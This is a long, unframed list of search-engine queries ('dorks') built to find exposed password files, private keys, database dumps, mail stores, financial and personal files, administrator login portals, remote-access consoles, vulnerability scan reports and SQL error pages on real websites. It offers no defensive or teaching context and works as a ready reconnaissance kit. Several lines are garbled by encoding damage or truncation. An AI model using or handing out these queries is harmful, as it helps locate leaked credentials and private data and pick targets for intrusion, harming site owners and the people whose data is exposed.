Link Department"
"sets mode: +k"
"your password is" filetype:log
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

Code:

nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin

INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and s?ri?ts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The s?ri?t whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
